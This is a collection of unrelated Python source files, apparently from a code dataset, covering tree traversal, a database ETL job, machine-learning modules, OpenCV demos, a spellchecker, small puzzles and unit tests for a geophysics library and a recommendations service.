        node = root
        while len(stack):
            if node.left and node.left not in visited:
                stack.append(node)
                node = node.left
            elif node.right and node.right not in visited:
                stack.append(node)
                node = node.right
            else:
                res.append(node.val)
                visited.add(node)
                node = stack.pop()
        return res
if __name__ == '__main__':
solution = Solution()
tree = TreeNode.list2Tree([5, 3, 9, 2, 4, 7, 10, 1, None, None, None, 6, 8, None, 11])
print(solution.LDR(tree))
print(solution.DLR(tree))
print(solution.LRD(tree))
|
991,684 | 5abc79e28c4b85d51c613a4a8744048a15766506 | #!/home/apollo/anaconda3/bin/python3
#-*- coding: utf-8 -*-
#******************************************************************************
# Author : jtx
# Last modified: 2020-09-03 16:37
# Filename : investor_kbp.py
# Description : 投资人kbp
#******************************************************************************
import sys
import logging
import time
from tqdm import tqdm
import datetime
from pymongo import MongoClient
from pyArango.connection import Connection as ArangoConnection
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
## 投资机构数据库
MONGO_HOST = "xxx"
MONGO_PORT = 0
MONGO_DB = "xxx"
MONGO_COLLECTION = "xxx"
MONGO_USER = "xxx"
MONGO_PASSWD = "xxx"
## 导入目标arangodb数据库
ARANGO_URL = "http://xxx"
ARANGO_USER = "xxx"
ARANGO_PASSWD = "xxx"
ARANGO_DB = "xxx"
ARANGO_INVESTOR_COLLECTION = "xxx" ## 投资机构库
class InvestorKBP:
    """One-shot ETL job: copies investor records crawled into MongoDB on a
    given day over to ArangoDB, overwriting documents with the same key."""

    def process(self, date_str):
        """Run the import for the records crawled on ``date_str``.

        :param date_str: "YYYY-MM-DD", or the literal "yesterday" to process
            the previous day's crawl.
        :raises ValueError: if ``date_str`` is not a valid date string.
        """
        # Default: process the data crawled yesterday.
        if date_str == "yesterday":
            date_str = (datetime.date.today() - datetime.timedelta(days=1)).strftime("%Y-%m-%d")
        logger.info("执行采集时间为: {} 的投资人kbp".format(date_str))
        process_date = datetime.datetime.strptime(date_str, "%Y-%m-%d")
        next_date = process_date + datetime.timedelta(days=1)
        start_time = time.time()
        mongo_client = MongoClient(host=MONGO_HOST, port=MONGO_PORT)
        admin_db = mongo_client["admin"]
        admin_db.authenticate(MONGO_USER, MONGO_PASSWD)
        mongo_collection = mongo_client[MONGO_DB][MONGO_COLLECTION]
        arango_connector = ArangoConnection(arangoURL=ARANGO_URL,
                                            username=ARANGO_USER,
                                            password=ARANGO_PASSWD)
        arango_db = arango_connector[ARANGO_DB]
        # Select one day's worth of crawled records.
        results = mongo_collection.find({"crawl_time": {"$gte": process_date, "$lte": next_date}},
                                        no_cursor_timeout=True, batch_size=50)
        source_count = 0
        target_count = 0
        try:
            for result in tqdm(results):
                source_count += 1
                # Assemble the ArangoDB document from the crawled record.
                doc = {
                    "_key": str(result["_id"]),
                    "name": result["name"],
                    "create_time": result["crawl_time"],
                    "update_time": result["crawl_time"],
                    "properties": {
                        "invest_institution": result["invest_institution"],
                        "position": result["position"],
                        "resume": result["resume"],
                        "phone": result["phone"],
                        "email": result["email"],
                        "url": result["url"],
                        "source": result["source"],
                        "invest_industry": result["invest_industry"],
                        "invest_round": result["invest_round"]
                    },
                    "tags": [],
                    "relations": [{
                        "relation_name": "任职",
                        "relation_type": "单向",
                        "end": result["invest_institution"]
                    }],
                }
                # Import into ArangoDB, replacing any document with the same key.
                try:
                    arango_collection = arango_db[ARANGO_INVESTOR_COLLECTION]
                    query = arango_collection.fetchByExample({"_key": doc["_key"]}, batchSize=1)
                    for q in query:
                        q.delete()
                    arango_collection.createDocument(doc).save()
                    target_count += 1
                except Exception:
                    # BUG FIX: log the traceback as well, not just the id.
                    logger.exception("导入arangodb错误, id: {}".format(doc["_key"]))
        finally:
            # BUG FIX: a no_cursor_timeout cursor is never reaped by the
            # server and must be closed explicitly; also release the client.
            results.close()
            mongo_client.close()
        end_time = time.time()
        logger.info("本次投资人kbp完成, 耗时: {} 秒".format(int(end_time - start_time)))
        logger.info("其中清洗库有: {} 条数据, 导入arangodb有 {} 条数据".format(source_count, target_count))
if __name__ == "__main__":
investorKBP = InvestorKBP()
if len(sys.argv) > 1:
investorKBP.process(sys.argv[1])
else:
raise Exception("请输入执行日期参数") |
991,685 | 8e232f76ca60e912db798c53e8e678e3ed4a4b94 | import tensorflow as tf
import numpy as np
from PIL import Image
import os
import math
from typing import List, Tuple
from memory import BaseMemory
from experience import Experience
import networks
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
class Brain:
    """Novelty-driven learner.

    Wraps a reconstruction network (built by ``networks.create_network``) and
    a memory of past grains; the novelty of a grain is its reconstruction
    error under ``novelty_function`` (MSE or MAE). Grains are added to memory
    with their novelty, and ``learn_grains`` trains the network on memory.
    """

    def __init__(self, memory: BaseMemory, img_size: Tuple, nov_thresh: float = 0.25,
                 novelty_loss_type: str = 'MSE', train_epochs_per_iter: int = 1, learning_rate: float = 0.001):
        """Initializes the Brain by creating CNN and AE

        Args:
            memory: BaseMemory
                A memory object that implements BaseMemory (such as PriorityBasedMemory)
            img_size: Tuple
                The image size of each grain from the agent's field of view
            nov_thresh : float
                (Currently deprecated). The novelty cutoff used in training
            novelty_loss_type: str
                A string indicating which novelty function to use (MSE or MAE)
            train_epochs_per_iter: int
                Number of epochs to train for in a single training session
            learning_rate: float
                Learning rate for neural network optimizer
        """
        assert train_epochs_per_iter > 0
        self._memory = memory
        self._img_size = img_size
        self._train_epochs_per_iter = train_epochs_per_iter
        self._nov_thresh = nov_thresh
        # Fixed training batch size; also used as the shuffle buffer below.
        self._batch_size = 4
        self._novelty_loss_type = novelty_loss_type
        self._learning_rate = learning_rate
        self._loss_functions = { \
            "mae": tf.keras.losses.MeanAbsoluteError(), \
            "mse": tf.keras.losses.MeanSquaredError(), \
        }
        if novelty_loss_type.lower() not in self._loss_functions:
            print("Novelty loss type not recognized. Exiting.")
            # NOTE(review): this kills the whole process on a bad argument;
            # raising ValueError would be friendlier to callers.
            exit(1)
        self.novelty_function = self._loss_functions[novelty_loss_type.lower()]
        # Create network and optimizer
        self._network = networks.create_network(img_size)
        self._optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)
        # print("Initialized Brain")

    def get_name(self) -> str:
        """Returns the full descriptive name of the brain object.

        Returns
            The name of the brain object as a string
        """
        # Encodes every hyper-parameter so runs can be told apart by name.
        name_str = "Brain"
        name_str += "_" + self._memory.get_name()
        name_str += "_ImgSize" + str(self._img_size[0])
        name_str += "_Nov" + self._novelty_loss_type.upper()
        name_str += "_Train" + str(self._train_epochs_per_iter)
        name_str += "_Lrate" + str(self._learning_rate)
        return name_str

    # def _init_CNN(self):
    #     """Initialize the Convolutional Neural Network"""
    #     # Create the base CNN model
    #     # TODO: Use different CNN base?
    #     self._CNN_Base = tf.keras.applications.VGG16(include_top=True)
    #     self._CNN_Base.trainable = False
    #     self._CNN = tf.keras.Model(self._CNN_Base.input, self._CNN_Base.layers[-1].input) # Use last FC layer as output

    # def _init_AE(self):
    #     """Initialize the Auto Encoder"""
    #     # VGG FC layers use 4096 neurons
    #     input_vec = tf.keras.layers.Input(shape=(4096,))
    #     # Encoder
    #     # TODO: Maybe try LeakyRelu(alpha=0.2) for all activations
    #     e = tf.keras.layers.Dense(4096, 'relu')(input_vec)
    #     e = tf.keras.layers.Dense(1024, 'relu')(e)
    #     e = tf.keras.layers.Dense(256, 'relu')(e)
    #     e = tf.keras.layers.Dense(16, 'relu')(e)
    #     # Decoder
    #     d = tf.keras.layers.Dense(16, 'relu')(e)
    #     d = tf.keras.layers.Dense(256, 'relu')(d)
    #     d = tf.keras.layers.Dense(1024, 'relu')(d)
    #     output = tf.keras.layers.Dense(4096, 'relu')(d)
    #     self._AE = tf.keras.Model(input_vec, output)

    def _grain_to_tensor(self, grain_in: Image.Image):
        """Convert a single grain to a tf.Tensor

        Params
        ------
        grain_in : Image.Image
            An image from the rover's "camera" that needs to be preprocessed

        Return
        ------
        The grain as a tf.Tensor
        """
        # rgb_grain = Image.new("RGB", grain_in.size)
        # rgb_grain.paste(rgb_grain)
        # rgb_grain = tf.keras.preprocessing.image.img_to_array(rgb_grain)
        # rgb_grain = tf.image.per_image_standardization(rgb_grain) # Transform images to zero mean and unit variance
        # rgb_grain = tf.image.resize(rgb_grain, (self._image_width, self._image_width)) # Resize to CNN base input size
        tf_img = tf.keras.preprocessing.image.img_to_array(grain_in)
        tf_img = (tf_img - 127.5) / 127.5 # Normalize to [-1,1]
        tf_img = tf.reshape(tf_img, self._img_size)
        return tf_img

    def add_grains(self, grains: List[List[Image.Image]]):
        """Add new grains to memory

        Params:
            grains: List[List[Image.Image]]
                2D List of new grains

        Returns:
            2D List of novelty for new grains
        """
        # print("Adding new grains to memory...")
        assert len(grains) == 2 # Expect a 2x2 grid of grains (4 total)
        assert len(grains[0]) == 2 # Expect a 2x2 grid of grains (4 total)
        nov_list = []
        for row in grains:
            temp_nov = []
            for g in row:
                grain_tf = self._grain_to_tensor(g)
                grain_tf = tf.reshape(grain_tf, (1, grain_tf.shape[0], grain_tf.shape[1], grain_tf.shape[2])) # Reshape to (1,H,W,C)
                predicted_grain = self._network(grain_tf)
                # Novelty = reconstruction error of the grain under the network.
                nov = self.novelty_function(grain_tf, predicted_grain).numpy()
                temp_nov.append(nov)
                self._memory.push(Experience(nov, g))
            nov_list.append(temp_nov)
        return nov_list

    def evaluate_grains(self, grains: List[List[Image.Image]]):
        """Evaluate a list of grains

        Params:
            grains: List[List[Image.Image]]
                2D List of new grains

        Returns:
            2D List of novelty for new grains, and 2D list for reconstructed grains
        """
        # print("Evaluating grain novelty...")
        assert grains != [] and grains is not None
        nov_list = []
        pred_grains_list = []
        for row in grains:
            temp_nov = []
            temp_grains = []
            for g in row:
                grain_tf = self._grain_to_tensor(g)
                grain_tf = tf.reshape(grain_tf, (1, grain_tf.shape[0], grain_tf.shape[1], grain_tf.shape[2])) # Reshape to (1,H,W,C)
                predicted_grain = self._network(grain_tf)
                nov = self.novelty_function(grain_tf, predicted_grain).numpy()
                temp_nov.append(nov)
                # Undo the batch dim and the [-1,1] normalization for display.
                pred_grain = tf.reshape(predicted_grain, (grain_tf.shape[1], grain_tf.shape[2], grain_tf.shape[3]))
                pred_grain = tf.keras.preprocessing.image.array_to_img((pred_grain * 127.5) + 127.5) # Convert back to [0,255]
                temp_grains.append(pred_grain)
            nov_list.append(temp_nov)
            pred_grains_list.append(temp_grains)
        return nov_list, pred_grains_list

    @tf.function
    def _train_step(self, images: tf.Tensor):
        """Performs a single training step for the network.

        Params:
            images: tf.Tensor
                A batch of images of size (batch, height, width, channel) for trainng the network

        Returns:
            The training loss for this step
        """
        with tf.GradientTape() as tape:
            predicted = self._network(images, training=True)
            loss = self.novelty_function(images, predicted)
        gradients = tape.gradient(loss, self._network.trainable_variables)
        self._optimizer.apply_gradients(zip(gradients, self._network.trainable_variables))
        return loss

    def learn_grains(self):
        """Train the network to learn new features from memory

        Returns:
            The current average loss from the last training epoch
        """
        memory_list = self._memory.as_list()
        grains = list(map(lambda e: self._grain_to_tensor(e.grain), memory_list))
        # NOTE(review): the shuffle buffer equals the batch size (4), so
        # shuffling is nearly a no-op — confirm a larger buffer wasn't intended.
        dataset = tf.data.Dataset.from_tensor_slices(grains).shuffle(self._batch_size).batch(self._batch_size).repeat()
        dataset = iter(dataset)
        num_batches = math.ceil(len(memory_list) / self._batch_size)
        cur_avg_loss = 0
        for i in range(self._train_epochs_per_iter):
            cur_avg_loss = 0
            for j in range(num_batches):
                data = dataset.next()
                loss = self._train_step(data).numpy()
                cur_avg_loss += (loss/num_batches)
        return cur_avg_loss
if __name__ == "__main__":
from memory import PriorityBasedMemory, ListBasedMemory
img = Image.open('data/x.jpg').convert('L').resize((64,64))
# NOTE
# 0.25 seems to be the smallest value that the novelty loss will go.
# If we use nov_thresh for training, do not set below 0.25
brain1 = Brain(ListBasedMemory(64), (64,64,1), 0.25, 'MSE', 1)
brain2 = Brain(PriorityBasedMemory(64), (64,64,1), 0.25, 'MSE', 10, 0.001)
print(brain2.get_name())
grain_nov = brain2.add_grains([
[img, img],
[img, img]
])
print("Grain novelty (before): ", grain_nov)
loss = brain2.learn_grains()
print(F"Loss: {loss}")
grain_nov, _ = brain2.evaluate_grains([
[img, img],
[img, img]
])
print("Grain novelty (after): ", grain_nov)
|
991,686 | 9f9ec86e8c46b92acbc722ed43fefa90e3e9e73b | # -*- coding: UTF-8 -*-
from typing import Tuple
import torch
from torch import nn, Tensor
class SparseCircleLoss(nn.Module):
    """Circle loss computed against one learnable proxy vector per class.

    Cosine similarities between L2-normalized embeddings and L2-normalized
    class proxies are split into the target-class similarity (sp) and the
    rest (sn), then combined with margin ``m`` and scale ``gamma``.
    """

    def __init__(self, m: float, emdsize: int, class_num: int, gamma: float) -> None:
        super(SparseCircleLoss, self).__init__()
        self.margin = m
        self.gamma = gamma
        self.soft_plus = nn.Softplus()
        self.class_num = class_num
        self.emdsize = emdsize
        # One learnable proxy embedding per class.
        self.weight = nn.Parameter(torch.FloatTensor(self.class_num, self.emdsize))
        nn.init.xavier_uniform_(self.weight)
        # Kept for backward compatibility only; the mask device is now taken
        # from the input tensor instead of this flag.
        self.use_cuda = False

    def forward(self, input: Tensor, label: Tensor) -> Tensor:
        """Return the mean circle loss for a batch.

        :param input: (batch, emdsize) embedding tensor.
        :param label: (batch,) integer class labels in [0, class_num).
        """
        # Cosine similarity of each embedding with every class proxy.
        similarity_matrix = nn.functional.linear(
            nn.functional.normalize(input, p=2, dim=1, eps=1e-12),
            nn.functional.normalize(self.weight, p=2, dim=1, eps=1e-12))
        # BUG FIX: allocate the mask on the same device (and dtype) as the
        # similarities; previously a CPU mask was created unless the manual
        # ``use_cuda`` flag was toggled, crashing scatter_ on GPU inputs.
        one_hot = torch.zeros_like(similarity_matrix)
        one_hot.scatter_(1, label.view(-1, 1).long(), 1)
        one_hot = one_hot.type(dtype=torch.bool)
        # sp: similarity to the true class; sn: similarities to all others.
        sp = similarity_matrix[one_hot]
        mask = one_hot.logical_not()
        sn = similarity_matrix[mask]
        sp = sp.view(input.size()[0], -1)
        sn = sn.view(input.size()[0], -1)
        # Self-paced weights (detached so they act as constants in the gradient).
        ap = torch.clamp_min(-sp.detach() + 1 + self.margin, min=0.)
        an = torch.clamp_min(sn.detach() + self.margin, min=0.)
        delta_p = 1 - self.margin
        delta_n = self.margin
        logit_p = - ap * (sp - delta_p) * self.gamma
        logit_n = an * (sn - delta_n) * self.gamma
        loss = self.soft_plus(torch.logsumexp(logit_n, dim=1) + torch.logsumexp(logit_p, dim=1))
        return loss.mean()
if __name__ == "__main__":
features = torch.rand(64, 128, requires_grad=True)
label = torch.randint(high=9, size=(64,))
SparseCircle = SparseCircleLoss(m=0.25, emdsize=128, class_num=10, gamma=64)
loss = SparseCircle(features , label)
print(loss)
|
991,687 | 26b3de9324f7a1f2713cd46879cd4d17e2018fb6 | import caffe
from caffe import layers as L, params as P, to_proto
def mynet():
    """Build a small demo net (dummy data -> conv -> BN -> ReLU -> deconv)
    and return its NetParameter proto."""
    data, label = L.DummyData(shape=[dict(dim=[8, 1, 28, 28]),
                                     dict(dim=[8, 1, 1, 1])],
                              transform_param=dict(scale=1./255), ntop=2)
    # Engine ids: CAFFE = 1, MKL2017 = 3.
    mkl_engine = {'engine': 3}
    conv1 = L.Convolution(data, kernel_size=[3, 4, 5], num_output=3, pad=[1, 2, 3])
    bn1 = L.BatchNorm(conv1, **mkl_engine)
    relu1 = L.ReLU(bn1, **mkl_engine)
    deconv_args = {
        'param': [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=2)],
        'convolution_param': dict(num_output=64,
                                  kernel_size=2,
                                  stride=2,
                                  engine=P.Convolution.CAFFE,
                                  bias_filler=dict(type='constant', value=0),
                                  weight_filler=dict(type='xavier')),
    }
    deconv1 = L.Deconvolution(relu1, **deconv_args)
    return to_proto(deconv1)
net = mynet()
# BUG FIX: `print str(net)` is a Python-2 print statement and a SyntaxError
# under Python 3; the call form below behaves identically on both.
print(str(net))
|
991,688 | 517c8456331b67fd9454b2349d2473a2599aa9ad | import cv2
import face_recognition
print(cv2.__version__)

# Load the photo and locate every face in it.
image = face_recognition.load_image_file('/home/fred/Documents/coding/Lernen/faceRecognizer/demoImages/unknown/u3.jpg')
face_locations = face_recognition.face_locations(image)
print(face_locations)
# face_recognition works in RGB; OpenCV draws and displays in BGR.
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
# face_locations entries are (top, right, bottom, left); cv2.rectangle accepts
# any two opposite corners, so this draws the correct box.
for (row1, col1, row2, col2) in face_locations:
    cv2.rectangle(image, (col1, row1), (col2, row2), (0, 0, 255), 2)
cv2.imshow('myWindow', image)
cv2.moveWindow('myWindow', 10, 10)
if cv2.waitKey(0) & 0xFF == ord('q'):
    # BUG FIX: destroyAllWindows was referenced without parentheses, so the
    # function was never actually called and the window never closed.
    cv2.destroyAllWindows()
|
991,689 | aa8c6a7abd9b2439fa276f9ea06bc690fa8cc3b4 | """
Smartcheck: smart spellcheck in pure Python.
FEATURES:
- Norvig's autocorrect
- 3-gram language model
TODO:
- Combine Norvig + 3-gram approaches
- Build better error model with errors from text
- Save + pickle the trained 3-gram, language, error models
"""
from nltk import bigrams, word_tokenize
from nltk.corpus import nps_chat
from collections import Counter, defaultdict
import re
class Smartcheck:
    """A smart spell checker.

    Combines Norvig-style edit-distance candidates with a unigram model
    (``self.model``) and a bigram model (``self.bigrams``, "w1 w2" -> prob).
    """
    def __init__(
        self,
        dict_file = "dictionary.txt",
        model_file = "count_1w.txt",
        bigram_file = "count_2w.txt"
    ):
        """Initializes language model with unigram and bigram probabilities."""
        self.dict_file = dict_file
        self.model_file = model_file
        self.bigram_file = bigram_file
        # Populated as a flat "w1 w2" -> prob map by pop_bigrams; the nested
        # defaultdict shape is only used by the legacy pop_bigrams_old path.
        self.bigrams = defaultdict(lambda: defaultdict(lambda: 0))
        self.model = {}
        self.pop_model()
        self.pop_bigrams()

    def process_file(self, filename):
        """Parse a tab-separated "token<TAB>count" file into a dict."""
        content = {}
        with open(filename, "r") as f:
            for line in f.readlines():
                key, val = line.split("\t")
                content[key.lower()] = int(val)
        return content

    def sentences(self, text):
        """All sentences in a given text."""
        return re.findall(r'([A-Z][^\.!?]*[\.!?])', text)

    def words(self, text):
        """All words in a given text."""
        return re.findall(r'\w+', text)

    def pop_model(self):
        """Populate model with probability of word (restricted to dictionary words)."""
        # BUG FIX: the dictionary file was opened without ever being closed.
        with open(self.dict_file, "r") as f:
            dict_words = set(line.strip().lower() for line in f)
        word_counts = self.process_file(self.model_file)
        N = sum(word_counts.values())
        for word in word_counts:
            if word in dict_words:
                self.model[word] = word_counts[word] / N

    def pop_bigrams(self):
        """Populate self.bigrams with "w1 w2" -> probability."""
        bigram_counts = self.process_file(self.bigram_file)
        N = sum(bigram_counts.values())
        for bigram in bigram_counts:
            self.bigrams[bigram.lower()] = bigram_counts[bigram] / N

    def pop_bigrams_old(self, corpus):
        """Populate self.bigrams with probabilities of next words.

        NOTE(review): legacy path, not called anywhere in this file; it also
        appears to pass an already-tokenized sentence to word_tokenize —
        verify before reviving it.
        """
        for sentence in corpus.sents():
            for w1, w2 in bigrams(word_tokenize(sentence), pad_right=True, pad_left=True):
                self.bigrams[w1][w2] += 1
        # Convert counts to probabilities
        for wp in self.bigrams:
            total_count = float(sum(self.bigrams[wp].values()))
            for w2 in self.bigrams[wp]:
                self.bigrams[wp][w2] /= total_count

    def predict(self, sentence):
        """Return {next_word: probability} candidates that follow the sentence.

        BUG FIX: this used to read ``self.trigrams``, an attribute that is
        never created anywhere in the class, so every call raised
        AttributeError. It now uses the bigram table keyed by the last word.
        """
        prev = sentence.split()[-1].lower()
        options = {}
        for bigram, prob in self.bigrams.items():
            first, _, second = bigram.partition(" ")
            if first == prev and second:
                options[second] = prob
        return options

    def word_probability(self, word, prev):
        """P(word) * P(prev word) under the unigram/bigram models, with a
        small floor probability for unseen events."""
        bg = "{} {}".format(prev, word)
        p_c = self.model[word] if word in self.model else 1e-10
        p_cw = self.bigrams[bg] if bg in self.bigrams else 1e-10
        p = p_c * p_cw if prev else p_c
        return p

    def correct_sentence(self, sentence):
        """Correct every word of ``sentence`` after the first, using the
        preceding word as bigram context. Returns the corrected sentence."""
        words = [w.strip().lower() for w in self.words(sentence)]
        # BUG FIX: an empty sentence used to raise IndexError on words[0].
        if not words:
            return ""
        corrected = ""
        for i in range(1, len(words)):
            corrected += self.correction(words[i], words[i-1]) + " "
        return words[0] + " " + corrected

    def correction(self, word, prev):
        """Return the most probable correction of ``word`` given ``prev``."""
        # Case 1: word is in model
        if word in self.model:
            return word
        # Case 2: word is unknown
        return max(self.candidates(word), key=lambda w: self.word_probability(w, prev))

    def candidates(self, word):
        """Candidate list of possible correct words (nearest edit distance first)."""
        return (self.known([word]) or \
                self.known(self.edits1(word)) or \
                self.known(self.edits2(word)) or \
                set([word]))

    def known(self, words):
        """Subset of ``words`` that appear in the unigram model."""
        return set(w for w in words if w in self.model)

    def edits1(self, word):
        """All edits that are one edit away from `word`."""
        letters = 'abcdefghijklmnopqrstuvwxyz'
        splits = [(word[:i], word[i:]) for i in range(len(word) + 1)]
        deletes = [L + R[1:] for L, R in splits if R]
        transposes = [L + R[1] + R[0] + R[2:] for L, R in splits if len(R)>1]
        replaces = [L + c + R[1:] for L, R in splits if R for c in letters]
        inserts = [L + c + R for L, R in splits for c in letters]
        return set(deletes + transposes + replaces + inserts)

    def edits2(self, word):
        "All edits that are two edits away from `word`."
        return (e2 for e1 in self.edits1(word) for e2 in self.edits1(e1))
def test(test_file):
    """Run the spell checker over a TSV of (wrong, correct) word pairs and
    print the accuracy; mispredictions are printed as they occur."""
    sc = Smartcheck()
    correct = 0
    incorrect = 0
    with open(test_file, "r") as f:
        for line in f.readlines():
            wrong, real = line.split("\t")[:2]
            predict = sc.correction(wrong, "")
            if predict.strip() == real.strip():
                correct += 1
            else:
                incorrect += 1
                print(wrong, real, predict)
    # BUG FIX: the success-rate report was accidentally duplicated (printed
    # twice); also guard against an empty test file (division by zero).
    total = correct + incorrect
    print("Success rate:")
    print(correct / total if total else 0.0)
if __name__ == "__main__":
# test("test2.txt")
sc = Smartcheck()
print(sc.correct_sentence("I like coffe"))
|
991,690 | 4f0099377cb336e4cfae51fa031f02d12c3d38d5 | '''
Input: a List of integers where every int except one shows up twice
Returns: an integer
'''
def single_number(arr):
    """Return the one value in ``arr`` that has no partner, where every
    other value appears exactly twice."""
    unpaired = set()
    for value in arr:
        # Toggle membership: a second sighting of a value cancels the first.
        (unpaired.remove if value in unpaired else unpaired.add)(value)
    # Exactly one value is left unmatched.
    return [*unpaired][0]
if __name__ == '__main__':
# Use the main function to test your implementation
arr = [1, 1, 4, 4, 5, 5, 3, 3, 9, 0, 0]
print(f"The odd-number-out is {single_number(arr)}")
# def single_number(arr):
# s = set()
# # use either a dictionary or a set
# # sets: holding onto unique elements
# # loop through our arr
# for x in arr:
# # for each element
# # check if it is already in our set
# # if it is, then that's not our out-element-out
# if x in s:
# # remove the element from our set
# s.remove(x)
# else:
# s.add(x)
# # the odd-element-out will be the only element in the set
# return list(s)[0] |
991,691 | 63e2add369d4a92fdf5444a6e32062284c32ca98 | import cv2
import numpy as np
from matplotlib import pyplot as plt
def nothing(i):
    """Trackbar callback — OpenCV requires one; simply echo the new position."""
    print(i)
cv2.namedWindow("image")
cv2.createTrackbar('x', "image", 0, 100, nothing)
cv2.createTrackbar('y', "image", 0, 100, nothing)
# The source frame never changes, so read and resize it once instead of on
# every iteration of the UI loop.
img = cv2.imread("media/balu_f.jpg")
img = cv2.resize(img, (960, 540))
while True:
    # Current Canny thresholds from the two sliders.
    x = cv2.getTrackbarPos('x', "image")
    y = cv2.getTrackbarPos('y', "image")
    canny = cv2.Canny(img, x, y)
    cv2.imshow("image", img)
    # BUG FIX: the edge map used to be drawn into the same "image" window,
    # immediately clobbering the original frame; give it its own window.
    cv2.imshow("canny", canny)
    k = cv2.waitKey(1)
    if k == 27:  # Esc quits
        break
cv2.destroyAllWindows()
991,692 | 63832b43c8d58ddd5b547d8d65b0d3ac869dd5ef |
import numpy as np
t = int(input())
def match(string):
zc = sum(np.array(list(string)) == "0")
oc = sum(np.array(list(string)) == "1")
return zc == oc * oc
for k in range(t):
s = input()
c = 0
for i in range(len(s)-1):
for j in range(i+1, len(s)):
if match(s[i:j+1]):
c = c + 1
print(c)
|
991,693 | e5ab463e61fdab9c8e7653841626001b2d22486c | import unittest
import numpy as np
from SimPEG.electromagnetics import viscous_remanent_magnetization as vrm
class VRM_waveform_tests(unittest.TestCase):
    # Consistency checks between the different VRM waveform parameterizations.

    def test_discrete(self):
        """
        Test ensures that if all different waveform classes are used to
        construct the same waveform, the characteristic decay they
        produce should be the same.
        """
        times = np.logspace(-4, -2, 3)
        # The same 2 ms unit square pulse, described explicitly as
        # (time, current) samples for the "arbitrary" waveform classes.
        t = np.r_[-0.00200001, -0.002, -0.0000000001, 0.0]
        I = np.r_[0.0, 1.0, 1.0, 0.0]
        waveObj1 = vrm.waveforms.SquarePulse(delt=0.002, t0=0.0)
        waveObj2 = vrm.waveforms.ArbitraryDiscrete(t_wave=t, I_wave=I)
        waveObj3 = vrm.waveforms.ArbitraryPiecewise(t_wave=t, I_wave=I)
        # Characteristic decays for both field (b) and its time derivative
        # (dbdt), under each parameterization of the same pulse.
        decay1b = waveObj1.getCharDecay("b", times)
        decay2b = waveObj2.getCharDecay("b", times)
        decay3b = waveObj3.getCharDecay("b", times)
        decay1dbdt = waveObj1.getCharDecay("dbdt", times)
        decay2dbdt = waveObj2.getCharDecay("dbdt", times)
        decay3dbdt = waveObj3.getCharDecay("dbdt", times)
        # Maximum relative mismatch of each arbitrary waveform against the
        # analytic square pulse.
        err1 = np.max(np.abs((decay2b - decay1b) / decay1b))
        err2 = np.max(np.abs((decay3b - decay1b) / decay1b))
        err3 = np.max(np.abs((decay2dbdt - decay1dbdt) / decay1dbdt))
        err4 = np.max(np.abs((decay3dbdt - decay1dbdt) / decay1dbdt))
        self.assertTrue(err1 < 0.01 and err2 < 0.01 and err3 < 0.025 and err4 < 0.01)

    def test_loguniform(self):
        """
        Tests to make sure log uniform decay and characteristic decay
        match of the range in which the approximation is valid.
        """
        times = np.logspace(-4, -2, 3)
        waveObj1 = vrm.waveforms.StepOff(t0=0.0)
        waveObj2 = vrm.waveforms.SquarePulse(delt=0.02)
        # Log-uniform susceptibility model with a very wide [tau1, tau2]
        # range, where the characteristic-decay approximation should hold.
        chi0 = np.array([0.0])
        dchi = np.array([0.01])
        tau1 = np.array([1e-10])
        tau2 = np.array([1e3])
        # Characteristic decays scaled by dchi/ln(tau2/tau1) should match the
        # exact log-uniform decays.
        decay1b = (dchi / np.log(tau2 / tau1)) * waveObj2.getCharDecay("b", times)
        decay2b = waveObj2.getLogUniformDecay("b", times, chi0, dchi, tau1, tau2)
        decay1dbdt = (dchi / np.log(tau2 / tau1)) * waveObj1.getCharDecay("dbdt", times)
        decay2dbdt = waveObj1.getLogUniformDecay("dbdt", times, chi0, dchi, tau1, tau2)
        decay3dbdt = (dchi / np.log(tau2 / tau1)) * waveObj2.getCharDecay("dbdt", times)
        decay4dbdt = waveObj2.getLogUniformDecay("dbdt", times, chi0, dchi, tau1, tau2)
        err1 = np.max(np.abs((decay2b - decay1b) / decay1b))
        err2 = np.max(np.abs((decay2dbdt - decay1dbdt) / decay1dbdt))
        err3 = np.max(np.abs((decay4dbdt - decay3dbdt) / decay3dbdt))
        self.assertTrue(err1 < 0.01 and err2 < 0.01 and err3 < 0.01)
if __name__ == "__main__":
unittest.main()
|
991,694 | 2a2206a5d488008850b39b3448e489b3441613df | """
Test cases for Recommendations Model
"""
import logging
import unittest
import os
from service.models import Recommendation, DataValidationError, db, Type
from service import app
from .factories import RecommendationFactory
TEST_DATABASE_URI = os.getenv(
"TEST_DATABASE_URI", "postgres://postgres:postgres@localhost:5432/testdb"
)
######################################################################
# RECOMMENDATIONS M O D E L T E S T C A S E S
######################################################################
class TestRecommendationModel(unittest.TestCase):
    """ Test Cases for Recommendations Model """

    @classmethod
    def setUpClass(cls):
        """This runs once before the entire test suite"""
        app.config["TESTING"] = True
        app.config["DEBUG"] = False
        app.config["SQLALCHEMY_DATABASE_URI"] = TEST_DATABASE_URI
        app.logger.setLevel(logging.CRITICAL)
        Recommendation.init_db(app)

    @classmethod
    def tearDownClass(cls):
        """ This runs once after the entire test suite """
        pass

    def setUp(self):
        """ This runs before each test """
        db.drop_all()  # clean up the last tests
        db.create_all()  # make our sqlalchemy tables

    def tearDown(self):
        """ This runs after each test """
        db.session.remove()
        db.drop_all()

    ######################################################################
    #  T E S T   C A S E S
    ######################################################################

    def test_create_a_recommendation(self):
        """ Test create a recommendation """
        recommendation = Recommendation(product_id=1, recommendation_product_id=2, relationship=Type.UP_SELL)
        # IDIOM FIX: assertIsNotNone / assertEqual instead of
        # assertTrue(x != None) and the deprecated assertEquals alias.
        self.assertIsNotNone(recommendation)
        self.assertEqual(recommendation.relationship, Type.UP_SELL)
        self.assertEqual(recommendation.product_id, 1)
        self.assertEqual(recommendation.recommendation_product_id, 2)

    def test_create_a_recommendation_missing_data(self):
        """ Test create a recommendation with missing data """
        recommendation = Recommendation(product_id=1, recommendation_product_id=None, relationship=Type.UP_SELL)
        self.assertRaises(DataValidationError, recommendation.create)

    def test_delete_a_recommendation(self):
        """ Delete a recommendation from the database """
        recommendation = RecommendationFactory()
        recommendation.create()
        self.assertEqual(len(Recommendation.all()), 1)
        recommendation.delete()
        self.assertEqual(len(Recommendation.all()), 0)

    def test_serialize_a_recommendation(self):
        """ Test serialization of a Recommendation """
